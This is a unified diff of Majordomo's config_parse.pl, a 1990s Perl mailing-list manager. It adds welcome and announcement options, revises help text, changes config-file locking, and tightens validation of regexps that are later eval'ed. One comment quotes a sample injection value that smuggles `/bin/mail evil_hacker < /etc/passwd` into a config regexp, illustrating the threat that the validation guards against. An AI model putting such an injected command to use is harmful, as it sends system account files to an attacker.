@@ -5,7 +5,7 @@
 # writes into the global variable %main'config_opts
 #
 
-# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.60 1996/12/23 15:03:24 cwilson Exp $
+# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.64 1997/08/27 14:41:32 cwilson Exp $
 # $Modified: Tue Dec 17 19:29:14 1996 by cwilson $
 
 # this array holds the interesting info for use by all tools
@@ -76,6 +76,8 @@ $installing_defaults = 0; # Set to 1 when installing defaults, in case
 # otherwise the value is the default value for the keyword.
 # if the value starts with #!, the rest of the value is eval'ed
 %known_keys = (
+	'welcome',		'yes', # send welcome msg to new subscribers
+	'announcements',	'yes', # send sub/unsub audits to list owner
 	'get_access',		"open\001closed\001list\001list", # open, anyone can access
         'index_access',		"open\001closed\001list\001open", # closed, nobody can
         'who_access',		"open\001closed\001list\001open", # list, only list can access.
@@ -145,42 +147,64 @@ $installing_defaults = 0; # Set to 1 when installing defaults, in case
 # An associative array of comments for all of the keys
 # The text is wrapped and filled on output.
 %comments = (
+'welcome',
+"If set to yes, a welcome message (and optional 'intro' file) will be
+sent to the newly subscribed user.",
+
+'announcements',
+"If set to yes, comings and goings to the list will be sent to the list
+owner. These SUBSCRIBE/UNSUBSCRIBE event announcements are informational
+only (no action is required), although it is highly recommended that they
+be monitored to watch for list abuse.",
+
 'get_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'index_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'who_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'which_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'info_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'intro_access',
-"One of three values: open, list, closed.  Open allows anyone
-access to this command.  List allows only list members access,
-while closed completely disables the command for everyone.",
+"One of three values: open, list, closed. Open allows anyone
+access to this command and closed completely disables the
+command for everyone. List allows only list members access,
+or if restrict_post is defined, only the addresses in those
+files are allowed access.",
 
 'advertise',
 "If the requestor email address matches one of these
 regexps, then the list will be listed
 in the output of a lists command.
 Failure to match any regexp excludes the list from
-the output. The regexps under noadvertise overide these regexps.",
+the output. The regexps under noadvertise override these regexps.",
 				
 'comments',
 "Comment string that will be retained across config file rewrites.",
@@ -207,7 +231,7 @@ maintainer approval. Closed requires maintainer approval for all
 subscribe requests to the list.  Adding '+confirm', ie,
 'open+confirm', will cause majordomo to send a reply back to the
 subscriber which includes a authentication number which must be sent
-back in with another subscribe commad.",
+back in with another subscribe command.",
 
 'unsubscribe_policy', 
 "One of three values: open, closed, auto.  Open allows people to
@@ -287,11 +311,15 @@ address of the sender is used as the value of the reply-to header.
 This is the value of the reply-to header for digest lists.",
 
 'restrict_post',
-"If defined only address listed in one of the files (colon or
-space separated) can post to the mailing list. This is less useful than
-it seems it should be since there is no way to create these files if you
-do not have access to the machine running resend. This mechanism will
-be replaced in a future version of majordomo/resend.",
+"If defined, only addresses listed in these files (colon or
+space separated) can post to the mailing list. By default,
+these files are relative to the lists directory. These files
+are also checked when get_access, index_access, info_access,
+intro_access, which_access, or who_access is set to 'list'.
+This is less useful than it seems it should be since there
+is no way to create these files if you do not have access to
+the machine running resend. This mechanism will be replaced
+in a future version of majordomo/resend.",
 
 'resend_host',
 "The host name that is appended to all address
@@ -388,6 +416,8 @@ the queue exceeds this number of days.",
 # match commands to their subsystem, by default only 4 subsystems
 # exist, majordomo, resend, digest and config.
 %subsystem = ( 
+	'welcome',		'majordomo',
+	'announcements',	'majordomo',
 	'get_access',		'majordomo',
         'index_access',		'majordomo',
         'info_access',		'majordomo',
@@ -442,6 +472,8 @@ the queue exceeds this number of days.",
 # the parse function will be called to parse the value string for
 # the keyword
 %parse_function = (
+	'welcome',		'grab_bool',
+	'announcements',		'grab_bool',
 	'get_access',		'grab_enum',
         'index_access',		'grab_enum',
         'info_access',		'grab_enum',
@@ -718,10 +750,17 @@ sub handle_flag_files {
 ########
 #
 # The function that does all of the real work.
-#     Called with a list directory and a list name.
+#     Called with a list directory, a list name, and optionally a flag
+#     that indicates the config file is already locked if true (and
+#     should be left locked on return).
+#
+# List config file locking is different than other files in that a
+# distinct lock file is used instead of just lopen() locking because
+# it's easier to manage a persistent lock than to try to keep the file
+# open (and thus locked) and pass the filehandle around.
 #
 sub main'get_config {
-  local($listdir, $list) = @_;
+  local($listdir, $list, $locked) = @_;
   local($parse, $here_doc, $stop, $end) = ();
   $end = 0;
 
@@ -758,8 +797,10 @@ sub main'get_config {
   &handle_flag_files($listdir, $list); # this looks for files of 
                                        # the form listname.function
 
-  &main'set_lock("$listdir/$list.config.LOCK") ||
-    &main'abort( "Can't get lock for $listdir/$list.config");
+  unless ($locked) {
+    &main'set_lock("$listdir/$list.config.LOCK") ||
+      &main'abort( "Can't get lock for $listdir/$list.config");
+  }
 
   print("making default\n") 
     if ($debug > 1) && (! -e "$listdir/$list.config");
@@ -768,7 +809,7 @@ sub main'get_config {
 		 unless -e "$listdir/$list.config" ;
 
   print STDERR "parsing config get_config($listdir, $list)\n" if $debug > 1;
-  &main'lopen(CONFIG, "", "$listdir/$list.config")
+  open(CONFIG, "$listdir/$list.config")
 			 || &main'abort( "Can't open $listdir/$list.config");
 
   while ($_ = <CONFIG>) {
@@ -852,9 +893,9 @@ sub main'get_config {
      }
   }
 
-&main'lclose(CONFIG);
+close(CONFIG);
 
-&main'free_lock("$listdir/$list.config.LOCK");
+&main'free_lock("$listdir/$list.config.LOCK") unless $locked;
 
 print STDERR @errors if $debug > 1;
 
@@ -1063,16 +1104,22 @@ sub grab_regexp_array {
 	    # m:yyy: ; `/bin/mail evil_hacker < /etc/passwd` ; "bar" =~ m:yyy:
 	    # END
 	    #
-	    elsif (($re =~ m:^((/)|m([^\w\s])): , $dlm=($2||$3)) &&
-		   $re !~ m:^m?$dlm[^\\$dlm]*(\\.[^\\$dlm]*)*$dlm[gimosx]*$: ){
+	    elsif ($re !~ m:^((/)|m([^\w\s])):) {
  		push(@re_errors,
  		    "|$re| not a valid pattern match expression at line $.\n");
- 	    }
- 	    elsif (eval "'' =~ $re", $@) {
- 		push(@re_errors, $@);
- 	    }
- 	    else {
- 		push(@return_re, $re);
+	    }
+	    else {
+		$dlm=($2||$3);
+		if ($re !~ m:^m?$dlm[^\\$dlm]*(\\.[^\\$dlm]*)*$dlm[gimosx]*$:) {
+		    push(@re_errors,
+ 		     "|$re| not a valid pattern match expression at line $.\n");
+		}
+		elsif (eval "'' =~ $re", $@) {
+		    push(@re_errors, $@);
+		}
+		else {
+		    push(@return_re, $re);
+		}
 	    }
  	}
 
@@ -1087,7 +1134,7 @@ sub grab_restrict_post {
 	local($list) = @_;
 	local(@files) = ();
 	
-        @files = split (/[:\t\n]+/, $list);
+        @files = split (/[:\s]+/, $list);
 	foreach (@files) {
 	    # add listdir if no leading /
 	    #
